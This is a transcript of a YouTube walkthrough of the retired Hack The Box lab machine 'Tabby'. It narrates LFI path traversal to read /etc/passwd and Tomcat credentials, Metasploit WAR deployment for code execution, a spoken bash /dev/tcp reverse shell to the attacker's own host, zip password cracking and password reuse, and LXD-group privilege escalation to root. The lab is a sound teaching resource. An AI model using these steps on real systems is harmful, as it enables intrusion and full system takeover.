 Hello everyone, my name is John Hammond. Welcome back to another YouTube video and in this video We're gonna be taking a look at Tabby a new retired machine from hack the box So I've got it open up on my screen here and Tabby is an easy machine Although you might consider a little bit more of medium. It's seemingly that's how the difficulty rating was going I've got the IP address set here and I am connected to their VPN so we can go ahead and get started I'll hop over to my terminal and I'll make a directory for YouTube Tabby And I'll jump in there create a little read me file that I could use to work with and take notes I'll just have a little markdown thing here I'll say my name and the name of the box and today is Saturday November 7th, 2020 Cool, cool, cool. All right now that we've got that done Let's make an end map directory and then we'll go ahead and kick off an end map scan I will use tack SC for default scripts tack SV to enumerate versions and tack on to output an end map format Now that I've created an end map directory I can just call it initial and I will slap in the IP address, which is 10 10 10 194 Well, that's going we can start another terminal down below and we could probably do some manual enumeration Maybe if this thing has a web server, we could go check it out through a web browser So I will open that up within Firefox and I am met with this Website apparently mega hosting and it says dedicated server starting from 99 USD 24-7 knowledgeable support full route access. Oh, okay One IP include with each server Your choice of any OS blah blah blah call us at this totally fake number and email us at sales at mega hosting dot HDB Oh, okay, so we do have a domain there. Let's go ahead and take that and if we hadn't let's go ahead and add it into our Etc hosts file That way we could get around whatever potential virtual host routing might be in there So I already have this added in but it just takes that syntax of okay the IP address 10 10 10 194 the specific IP of what you want it to redirect to and then we'll paste in mega hosting dot HDB as that is the domain that we kind of want here I'll save that you do need root privileges to be able to modify that so I pre-fixed that command with sudo and I think our end map results came back So let's see what we've got to work with looks like we have our scan with port 22 open so SSH Port 80 open for HTTP the website which we've already seen and have been accessing and port 80 80 is also open with Tom cat Okay, cool. I guess that makes sense. We did see kind of the little cat icon for the hack the box the logo for tabby this machine here With that we could probably start to enumerate or just actually kick off a second end map scan With all ports. So I'll use that tack P tack Argument there and I'll just save that as all ports on that guy and we'll continue to bump around this website Now that we've added this mega hosting dot HDB That's in our host file. So now I should just be able to access mega hosting dot HDB and Oh, I did mean to go to that, please. I don't need any of those things. Take me to that Thank you. Appreciate that web browser. Okay, so now if I were to check out any of these links here I'm looking down the bottom left of my screen to see where they go And if I were to click on any of these they seem to just bring me back to This home page. They don't actually exist. Oh infrastructure. Okay, a little anchor tag that brings us down All of these are also going nowhere looking at the bottom left of my screen. They all go to the exact same page Which is this home page? Same thing with the footer Nothing extremely interesting just bringing us back. I do see this note here though We've recently upgraded several services. Our servers are now more secure than ever read our statement on a recovering data From the recovering from the data breach. Oh, and that actually has a link to it and That goes to news dot PHP same thing that this news dot PHP goes to over in the in the address here the navigation That looks like it's bringing us to a URL with news dot PHP and the question mark to indicate like a little HTTP Get variable looks like it's file here and that's it equal to this value statement That's kind of peculiar to me I know it says hey we apologize all our customers for the previous data breach We change the site to remove this tool and invest heavily in more secure service. Cool. Whatever if I were to view the source There's Nothing extremely interesting here. I'm scrolling through to see any like green indicated HTML comments But there's nothing spooky squirrely in that I am curious about this URL though because if it's saying file equals and This PHP pages the page that loads it Maybe it's trying to access an actual file on the file system and it's doing some Local file inclusion and maybe we could take advantage of that maybe we could kind of abuse that vulnerability I don't know if that is Including a dot PHP file extension suffix though So in older versions of PHP you could use a null byte or a percent zero zero in the web browser And they would just end the string so if if this Back-end web server is using an appended dot PHP file extension and if we're on old-school PHP like five or something that would get in the way and It wouldn't append it. So if I were to try and add that dot PHP that doesn't seem to do anything. Is there like a Dot HTML or dot text portion of that. I'm not getting anything so the page isn't returning Is that like in the topmost folder? Is that like in the root directory of the web server? Can I just go to statement dot text? No statement on its own nothing How about statement dot PHP still nothing, okay Before I forget we probably actually could go back to our terminal and run some simple scans like Necto 101010. Oh, and let's use the virtual host routing because that might Give us a little bit more stuff. No, I have two HTTP schemas. So I'm just grabbing the URL For this web page Specifying tack H as a header or the host argument for Necto And I'll use that as kind of a scanner and I will tee that into Necto dot log so I get those results there I'll do the exact same thing with go buster just so I can start to kind of enumerate Maybe anything that I'm not seeing on the website. So I'll use go buster dur HTTP and it was like what mega hosting dot htb tack w to specify a word list and I'll use in my op directory this directory list lowercase Medium and I'll tee that to a go buster dot log There we go. Oh, it found files. That's kind of interesting. What is in files? Slash files. I can't see that is the News dot PHP file equal statement thing reaching to a file within That files folder. Is there a files? We can't like do any directory indexing or directory listing, but is there a files dot statement dot PHP? Files statement HTML or text. Okay, what about just no file extension? Oh That got a result back Okay, and that's just Like the bare bones HTML for that page Okay, so it's definitely loading this file If I go back to that news dot PHP and there's no file extension Maybe we could use like a PHP filter so if you find a local environment very or excuse me local file inclusion vulnerability and It is appending or it isn't appending a dot PHP file extension suffix You could use this PHP filter to potentially get like the source code because the web server is gonna process that PHP on the back end but and you never get to see that right as the end user as the as the I guess client interacting with the web page But if you could get PHP to convert all that data into something that isn't going to be processed as part of the PHP language like a base 64 encoding you might be able to retrieve that source code So I always forget this syntax. So I have to Google it every time If you see an HTTP get variable being used to potentially read in a file, then you could just Get that Let's supply PHP filter convert base 64 encoder resource equals Statements I guess is worth a try You source nothing is there. Okay, what about like I know I'm in the I'm know I'm in the files folder relative to the current page, right? So if I did News dot PHP nothing What if I don't Filter I just specify file equals news dot PHP. Is there anything in there? Oh, oh, I Just viewed the source there. I hit control you on my keyboard Okay, and looks like it's just actually reading the PHP code to oh Oh, so this is the source for the news dot PHP file and it's not running include it within PHP It's actually opening up the file and reading every single line to display it out on the screen Okay, so this is like a sort of file get contents or F gets thing where it's literally reading the file Not including the PHP code as if it would execute the PHP code It's just going to read the contents of the file. Okay but my little Dot dot slash work so I knew I could climb the file system Can I go like dot dot slash dot dot slash dot dot slash dot dot slash? Etc. Etc. Etc to climb up the file system tree and can I get to like it's a repassword? Oh I can Okay Cool. Okay. So we've got some users there. It looks like I see ash as a potential user These are all things we should probably be taking note of in our read me. So Nmap results found 80 and 8080 Apache Tomcat 80 has LFI volna slap in that URL And we'll just make a little syntax there for it Potential username user. Well, I mean, I guess it's not really potential. We know because we've just read it's a repassword We do have an ash user. Okay So we because we have local file inclusion. What more could we do with this? We know we have that Apache server Did Nikto find anything interesting? No Not really whatsoever, whatever, but we do know We we know we have the Apache Tomcat server, right? We saw port 80 open with our nmap scan So let's hop over to that and know that we have this LFI kind of in our back pocket So if I go to mega hosting dot htb on port 8080. Oh, I see it works If you're seeing this page via web browser, it means you've set up Tomcat successfully congrats Okay, so this is just a straight up default. Yeah, this is the default Tomcat home page It can be found in local system at That location neat. Can I read that like with my with my local file inclusion? If I go up up up up Just adding my dot dot slash repeatedly Can this thing read it? Yeah, it can. Okay, cool So this local file inclusion might be super duper helpful if we wanted to get anything that the Tomcat thing might have Tomcat veterans may be pleased to learn the system instance of Tomcat is installed with Catalina home and user share Tomcat 9 ah And Catalina base those are environment variables those are like the config locations for Tomcat and stuff and that might be super duper helpful for us because We can access the Tomcat 9 and 9 looks like the version that we're working with so that's important to know Tomcat 9 docs We can reach. Okay, and that's serving it from this server. It's not third-party external on the open internet This is on the box. That's good to know Tomcat 9 examples. We can also reach Tomcat 9 admin. That's what we want We want to be able to mess with some stuff. You can access the manager web app and That needs a username and password. Okay, and the oh, yeah, thanks So I just hit escape and you're not authorized to view this page If you have not changed any configuration files, please examine the conf Tomcat users in your installation What is that Tomcat users at XML? Is that where oh? That file must contain the credentials to let you use this web app. Okay, so that's where our credentials are going to be It's in the Tomcat users at XML file. Is that in conf? Note that for Tomcat 7 and onwards the roles required to use a manager services were changed from the single manager role to the following four rules Okay Manager GUI allows access to HDMI GUI good manager script allows access to text interface in the status page Etc. Okay, okay That's fine. That was one of those pages that was the manager web app But can I actually reach the host manager web app this other link here? Let me click on that and that also is password protected. Okay, I'm gonna hit escape on that Not authorized to view this page Same need to check out Tomcat users and we need the admin GUI role. Oh Are these like default credentials we could use? Tomcat secret with the little s3. It's worth the try Admin GUI allows access to the HTML GUI, which is this page and admin script allows access to text interface. Okay Let's try and go back to that page. Oh Did I like lose my opportunity? Oh, okay, cool I just hit control at five to get prompted again and hard refresh that so Tomcat with the password secret with a 3 For the first e that is not the right password We could try some like Tomcat default username and password pairs or I think MSF console can do that I think a metasploit has that thing and there is like a word list like there is a dictionary list of all the potential Default Tomcat username and password. So if I search for Tomcat, let's let's search for Tomcat. What do we have here? There's a lot of stuff, but I want to check out some of the auxiliary scanners Check if you have default access to the Tomcat administration tool with Tomcat administration utf-8 traversal trend micro auxiliary scanner HTTP Tomcat user enum auxiliary scanner HTTP Tomcat manager login. Hmm. I think that's the one. Let's try that Let's uh, let's go ahead and use auxiliary scanner HTTP Tomcat manager login Let's show options to see what we're working with here and I am gonna be using metasploit by the way You can grab like your pitchforks and you can kind of whine and say hey Script kitty, whatever. I don't really care if there's a tool. Why have tools if you're not going to use them So, okay target URI goes to manager HTML and we did see that that URL was that manager web app that did bring us to slash manager slash HTML so that's the right location for target URI username is Not mandatory yet because it'll fill all that in same thing with user pass and user file actually pulls from okay default users and default passwords and that is bundled in the Metasploit framework, okay, we just need to give it an actual our hosts. So our port is still 8080 But we need to set our our hosts variable. So let's set our hosts to 10 10 10 190 And crank the thing Login failed login failed login failed login fail. Okay, so that's not that's not working for us Okay, well, that's a bummer. Oh well, wait a second. We have that local file inclusion vulnerability We could potentially read or find where the Tomcat users Like credential file is right the home page here said Catalina home is in user share Tomcat 9. So where is Tomcat user is XML Location if I just Google that Tomcat users XML is located by default and Catalina home cough Tomcat users at XML. Okay So we can put those pieces together, right? If we've got the value of Catalina home and we know where this thing might be Let's Smartly figure that out. Let's climb up up up up up up up up And let's try that user share Tomcat 9 and this said CO&F comp, right? Trap, where did that go? That was in the manager web app CO&F Tomcat users XML and that's the credentials file. So slap that in There's nothing there. Oh, okay. There's just right up nothing there Crap that file probably that's probably not the right location. I Guess we could like look in a docker instance or like a docker image for Tomcat Like a Tomcat docker hub Okay, so yeah, there are official images for a Tomcat installation Maybe if we just go to the different tags and try to find one that's version 9 maybe Okay, there's like a 9. Yeah, whatever a 9.0 a 9. I don't care. I guess I'll just grab it Can I like Docker pull this down? Okay Docker run on That thing and I guess I'll make it like an interactive terminal. So tack it Run bin bash. Okay, and then I guess we'll just try to find a file with a name of Tomcat hyphen users XML User local Tomcat com Tomcat users at XML. It's worth a try. Maybe well, I don't know because it ours said it was in Like if we go back to the the home page there, right if I go to This it says its user share Tomcat 9 and It said it's com Tomcat users after Catalina base or Catalina home. So Will that one work? I feel like that's totally the wrong location. No That's totally the wrong location We could take the old one and I guess like kind of fuzz it Like if we know this is Catalina home, right user share Tomcat 9 and then we know we want a Tomcat users That is in some directory in there We could like fuzz it maybe I could use like W fuzz like if I exit out of this bash shell Can I use W fuzz? W fuzz taxi to use colors and then I Need a word list, right? So I'll use the opt directory list medium and I will specify the URL I guess I don't need that view source in there anymore But I want to fuzz this directory Fuzz so I could just it could try a bunch of stuff and see if it ever gets a response if I whack that Okay, it's trying a bunch of stuff But we're all zero length or zero words or zero characters because those are all probably the wrong location It's not returning a file Let's use that same command and grep for The things that aren't a zero length response So grep tack v to invert what we see and we'll see if we get a bunch of stuff here. Oh, okay, okay Oh Stop stop there was a 200 response with 47 length and some characters in there in et cetera or etc. Okay. Is that a location for us et cetera? Yes, awesome Okay, so now we have the User name and password we could use to access The admin portion of Tomcat, right? So we have the admin GUI role and the manager script role So let's grab these credentials. I guess we'll save them in our in our readme file and We'll keep track of this URL found Tomcat credentials Via our LFI technique and now we have Tomcat as a user and the super secure password and lead speak With that so if I go back now and try to access that manager web app I'll control f5 and I will use Tomcat with that super secure password that I copied and pasted Access to nine you are not authorized to view this page by default the manager is only accessible from browser running on the same machine as Tomcat Okay, that doesn't help. Oh the roles here though. We have manager GUI manager script those the ones that have actions We don't have manager GUI. We only have manager script. What about that other page? host manager web app Tomcat credentials, ooh, ooh, ooh that worked But this looks like it's just the virtual host manager so I can list hosts or add them Okay, I have local host. That's Lamo we saw some stuff in Metasploit, right? If I go back to my Metasploit, uh, I could once again search for Tomcat and Get to manager deploy or manager upload What are the one we have manager script as a role? So what are the things that I can do with Tomcat manager script exploit? Exploding Apache Tomcat manager script role Excellent. Okay Exploding a Tomcat manager script role you hate to see it hate to see Apache Tomcat They got the user they found the role. Okay, and they upload a war file How did they do that? Oh, they put it in manager text deploy deploy it looks like what it what it needs so Metasploit could probably do that right with the with the deploy one if I use Manager deploy let's see what options we've got to work with I will go ahead and set my L host to be my little one there my interface for the Hack the box open VPN connection and I'll set it an explicit L port because I think quad 4 It's in the way some stuff and I need to know the HTTP password and username Which we do know so I'm gonna set this as global in case we need to jump to a different one But let's set the password first because I happen to type that first I will go ahead and paste that in and then we'll do the same thing setting the user name Which we know is just Tomcat, okay And the our port is wrong that needs to be 8080 and we still need to set the our hosts So let's set the our hosts 10 10 10 194 and our port Port should be 8080 run I Just set my L port to something else set L port to 5555 do it Error requesting manager server info is that not a thing exploit aborted due to failure no target unable to automatically select a target Well, you don't have to select a target automatically. Can I see the targets that you can do? Yeah, you don't need to use an automatic one I know this is gonna end up running either on Java or on Linux because it's a Linux server running Java We saw that with our end map scan. So let's set Target to like one and see if that goes upload field on manager deploy path That's not right. It needs to be manager Sorry, I realized that was hard to see manager deploy Needs a location, but that's that manager slash text. So can I get to that? If I go to a host manager If I go to manager slash text, yeah, that's a thing and there is a deploy page. Yeah, yeah, yeah Okay, so set What is that? What is that option show options? Path needs to be slash manager slash text set path Slash manager slash text Now go. Oh Okay What? What? Set verbose to true Let's run it again. Why no session. Oh That's my that doesn't look like the right Such a L host stinking. Why did none of my local settings take place? That doesn't look like the right IP address What is my current? IP AS tons here. What's my current local IP address this thing? Let's go to that, please Set L host to my IP address now run. Okay. I Don't know why that was doing that whatever We've got a matter session, right? We're on the box. We've got code execution. So we're currently the Tomcat user Let's bebop around I guess where am I right now PWD, okay, Varlib Tomcat 9. Can I get into that ash directory? ash Nope. Oh I don't Whoa, where am I now? I don't know. Can I just get to home, please? Okay, I do not have permission to go into the ash home directory seemingly We could get a better shell if we didn't want to use meterpreter. I could just pop over to pwncat or something Maybe we'll do that Let's do that So I'm going to hop over to My get directory for pwncat. I'm gonna go ahead and get pull Great, we've got all the latest changes. Let's go ahead and activate the virtual environment So source been activate now that that's good. Let's go ahead and run pwncat listening on quad eight Cool. Okay. Now that that's a thing we can try and get into a shell here And let's just run a bash tack C to make sure we're in bash bash tack I redirect it to an ampersand and dev TCP What was my p address again, I always forget this 14 8 10 10 14 8 Quad 8 8 and then it's 0 redirected ampersand 1 go did work Did work? Did I have my wrong IP address? It's on 0 10 10 10 14 8. Oh, I had a stinking. I literally said it and then got it wrong bash tack C bash tack I ampersand dev TCP 10 10 10 14 8 I Wrote 18 when I meant to just use 8 there we go Please for the love of God This video is going really really well. I don't know why Dev TCP 10 10 14 8 quad 8 0 retroacted to 1 What's going on Did this thing break? Is that why did I break it because of the first command? Yeah, terminate that channel get me back into a regular shell slap that in and that syntax would have worked just fine I just broke it earlier like an idiot. That's all All right, now we've got a regular normal shell in here And we could upload and download things with the benefit of Poamcat We can move into ash or see the proper error messages Let's go explore the web server in case it was some stuff like connections to a database that we had missed or whatever That files directory. I know we didn't have any interest or like visibility in we would we didn't have any coverage of that so let's hop into VAR Html the default location for the web server and in files There is some interesting stuff. Okay, there's an archive directory With nothing in it. How about revoked certs and with nothing in it, but I do see that backup Let's go ahead and download that let's download 16 thing pull it down. Okay, and let's move Back on my original host. Let's move the git Poamcat because that's in the current directory that I was in that backup into here And let's try and unzip that backup zip archive. Oh, it needs a password Okay We could use fcrack zip So I always remember the credential I always remember the arguments to fcrack zip with the tack UDP capital D You can remember that however you'd like But then it needs to know the password, right? So I'm gonna use rock you dot text and I'm gonna try and use the Zip file that we downloaded that took me a while to process There we go password found is admin at it. Okay Now can I unzip that archive? Yep slapping that password and it looks like we've got an old-school backup of the PHP and the web server So let's move into that var directory www HTML and Index.html might showcase some interesting stuff. I Don't see any interesting. Oh, sorry index dot PHP is what I meant to say with that file extension But I don't see any interesting PHP files So That's a pain. There's no PHP syntax in here. Oh There's a different email now X speed studio XP XP studio at gmail.com Nothing else interesting in there. There's literally no PHP in this. This doesn't this doesn't help me What about the news dot PHP that's the exact same syntax we saw earlier that doesn't help Anything in files. No What is that read me? Are there any credentials in there? Oh This is just a bootstrap theme. So there's nothing interesting in that either Okay That seemingly useless But I guess we have a password and maybe right we had that admin at IT Password it is a password and we got to keep that in mind. So I wonder if like that might be a password for that ash User, it's worth a try we could try and just like SSH in SSH ash at ten dot ten dot Ten dot one ninety four. Oh And that needs a public key. Okay. I guess we could just try and SU to it back in our Reverse shell su ash with admin at IT. Oh That worked Okay, cool now. We're the ash user Great. Well, let's let's try and do some I guess regular enumeration that we probably should have done earlier Let's go ahead and run enumerate From Ponecat So it's gonna use kind of its equivalent of lin peas. Let's see if we've got anything interesting in here. I Will scroll scroll scroll scroll scroll all the way up to the top Blah blah blah enumerate gather Mountpoint set UID binaries. Oh, we have snap. What is this? Is this like a new bunty box or something? Probably ASLR is on that's annoying Not that I don't think we probably don't have to care about it Some metasploit payloads in there cool It said rehosts. Oh We have screen. Yeah, okay, so a bunch of 2004 and What are we running here a Lot of services nothing Incredible potential password And the Tomcat stuff cool punk cat was able to find the password that we found earlier a lot of False positives for that file capabilities none of those seem out of place paying an MTR packet are kind of normal kernel version System hostname is tabby cron entries look normal pseudo version Okay, so Ponecat probably did its own enumeration But it is also worthwhile to run lin peas on its own Because I think it's good to kind of double up Hey, the tools that you're using maybe one tool might find something that another didn't so we can get Lin peas on the box and let's go ahead and run it to see if it finds any Interesting enumeration stuff and ooh, okay, it actually immediately find something that I'm kind of interested in the You know the the key that the beautiful lin peas will use. Oh wow, what did I do? That that will give you a little kind of color-coded legend as the things that are very very likely a privilege escalation vector And I can see immediately that just the output of the ID command here This ash user that we're running as is in the LXD group So I've showcased an LXD or LXC previsk previously in a different video the Trihack me gaming server room I think I showcased it but looks like we could use that technique to go ahead and Escalate our privileges to get root. We are of course like hey running as this ash user So if you wanted to yeah, you can go in into his home directory go ahead and grab user dot text I'll go ahead and show you that that's a thing 33 characters 32 being the hash and then the new line character at the very end You could submit that and get your points and do whatever But let's try and escalate our privileges with LXC because we can run that command there, right? Okay, so we can see if there are any images or kind of containers. We could go ahead and run So let's do LXC list and looks like there's nothing in here currently so we need to go ahead and create one So let me do a little Google for LXC previsk And it looks like there's some stuff we could use for Hactrix that's great. There's an exploit DB article here. Oh, it looks like this is the script I think I had used in that gaming server video this is super duper handy because you can just give it a Alpine it built image instance and then it'll go ahead and go ahead and run the LXC commands to go ahead and import that file Create it as a container add it the root Location in there or mount this target file system So you could go ahead and actually manipulate This file system and be root right and go ahead and execute it and get a shell inside that container And then it'll go ahead and remove it and clean it up for you. So I will use this. This is super handy This is super great. So I'll go ahead and copy this and let's just move into dev SHM again, and let's go ahead and add this into like LXC. I Guess like previsk.sh and I will slap all this stuff in great Save that. So now that I have that LXC previsk script Let's mark that as executable. And then if I were to run it It will need a file name of the built Alpine image that we can create a container from because LXC will allow us to create a Container that we could use and because we could use that we could actually mount this file system and act as root on That so that's pretty great And I and I cover that a little bit more in the tryhack me gaming server room So if you're interested, please go take a look at that video But for now, I mean I will showcase how we could go ahead and run that looks like we are going to use this build Alpine tool and They recommend it here in the you little script that they've offered So I will go ahead and get back to my host machine And I will move up to get into that YouTube tabby directory and I'll run that command to download the build Alpine script I'll take a look at it all it's going to really do is grab the like Alpine Linux install and static Information and the files and the repositories and the package manager everything that it really needs and then it bundles it all together into a file system and builds an Image that we could use and installs it and works with it So I'm trusting of it It tells me that you need to run this as root and it is the good idea to okay Go ahead and actually read through the code that you're going to end up running before you sudo dot slash and actually run a script, but this templating does require root access So let's run the thing and build our instance So I'll sudo I for I mark this as executable. I'll build that Alpine and sudo dot slash build Alpine Needs my password here It will download everything it'll go ahead and fail apparently okay, um Does that need a specific mirror selecting mirror? Where are you finding that? Where are you choosing that mirror? Maybe that mirror is not a good mirror Alpine build Alpine mirrors Where did you put all this? Oh and root FS? Yeah. Yeah. Yeah, okay, so Mirrors are in root FS user share Alpine mirrors mirrors dot text. Can I CD into that? Yeah, it's a file. I know so can I sub all that? No Oh mirrors dot text has all this stuff, okay Which one did it choose in the script? It chose ARR net Why'd you choose that one our net? Did you just kind of like choose that at random? Let's use just the very top one please and yeah, let's It's owned by root. So let's run it as root and let's try to do that again, please Now it's using that deal. Okay. Good. It's installing the stuff that it needs So maybe that will behave for me fingers crossed Installing all this stuff so we can build that Alpine image and we can get that onto our victim machine We'll just go ahead and upload it then use that script on the target and then go ahead and mount all that So now I have an Alpine v3 12 one This whole thing that we can go ahead and upload so I will do that now I'll get back to my target and I will go but go ahead and upload home John CTF hack the box YouTube tabby and it's this thing So I can upload that and it's gonna take a little bit of time because it is three megabytes But it should be quick. Thanks to the Ponecat magic Great now that that's done. Okay. We have that there and I can run LXC prevask and That needs to know the file name So I will use tack f with that Alpine image and it should fingers crossed be able to import that and run it There we go device. Give me root added to prevask and I am currently root now I'm root inside this container, but it mounted the target file system and slash Mnt root, right? Yeah, now I have the target file system there. So if I cat, it's that repassword Relative like without using the ford slash the beginning. I'll get the output that has ash in there So relative to this current location where I am right now inside of slash Mnt root I am root on their file system So sure you could hop into the root directory and you could again grab the root dot text and you could be done That's it, but you're kind of like, you know me. I like to do my classic. Hey, let's get a real root shell on the system So let me go ahead and ch mod plus s on bin bash Again relative within inside This file system for the target and the victim file system. Now if I were inside of this container I wanted to exit out. I could stop this container I'll bring myself back to being Ash at this tabby, but I can now run bash tack P because we've modified the Victim target bin bash to be a set UID binary. That's what that ch mod plus s will let us do So I could invoke bash with tack P to maintain those set UID brights and now I am the root user I can run who am I and I am in fact root so I can go back to C slash root LS tack LA all this stuff in here. I can grab root dot text. I could read it. I could Grab that flag and be done with this box. So That was that and there were a lot of fumbles and fails and this video took way longer than it needed to If you wanted to I guess you could like move into the SSH and grab that private keys or write your own or do whatever But that's it. That was all the gimmicks and gotchas there The hardest part for me was finding that location that the Tomcat credentials would be trying to find that specific path For this Tomcat version was an absolute pain But I hope using W Fuzz to be able to kind of just hate brute force it and find it. Maybe that was kind of cool Maybe that was kind of fun. So I hope you enjoyed this video Thank you so much for watching if you did like this video, please do do the YouTube algorithm stuff Maybe like the video type a little comment subscribe and super duper grateful But thank you. Thank you. Thank you for watching this video and I'll see you guys in the next one. Take care